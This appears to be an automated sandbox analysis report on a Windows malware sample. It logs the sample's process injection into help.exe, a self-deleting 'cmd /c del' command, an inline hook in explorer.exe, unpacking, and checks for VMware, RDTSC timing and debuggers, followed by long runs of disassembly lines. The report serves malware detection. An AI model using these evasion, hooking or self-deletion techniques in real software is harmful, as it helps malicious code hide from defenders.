          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Users\user\Desktop\SX365783909782021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: SX365783909782021.exe, 00000000.00000003.209611066.0000000009B30000.00000004.00000001.sdmp, SX365783909782021.exe, 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, help.exe, 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SX365783909782021.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeUnpacked PE file: 2.2.SX365783909782021.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_73762F60 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419916 push ecx; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041692C push cs; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00416B53 push edi; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041AB2B pushad ; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C1D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419916 push ecx; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041692C push cs; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00416B53 push edi; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041AB2B pushad ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0367D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321AB2B pushad ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03216B53 push edi; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321692C push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D13C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219916 push ecx; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D085 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D0DB push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile created: C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xED
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4660Thread sleep count: 31 > 30
          Source: C:\Windows\explorer.exe TID: 4660Thread sleep time: -62000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 4740Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.226481174.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.219682081.0000000004E61000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-s
          Source: explorer.exe, 00000003.00000000.247140572.0000000004E61000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-
          Source: explorer.exe, 00000003.00000000.247457581.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.226715278.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.221477185.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAJ
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C453CA mov eax, dword ptr fs:[00000030h]
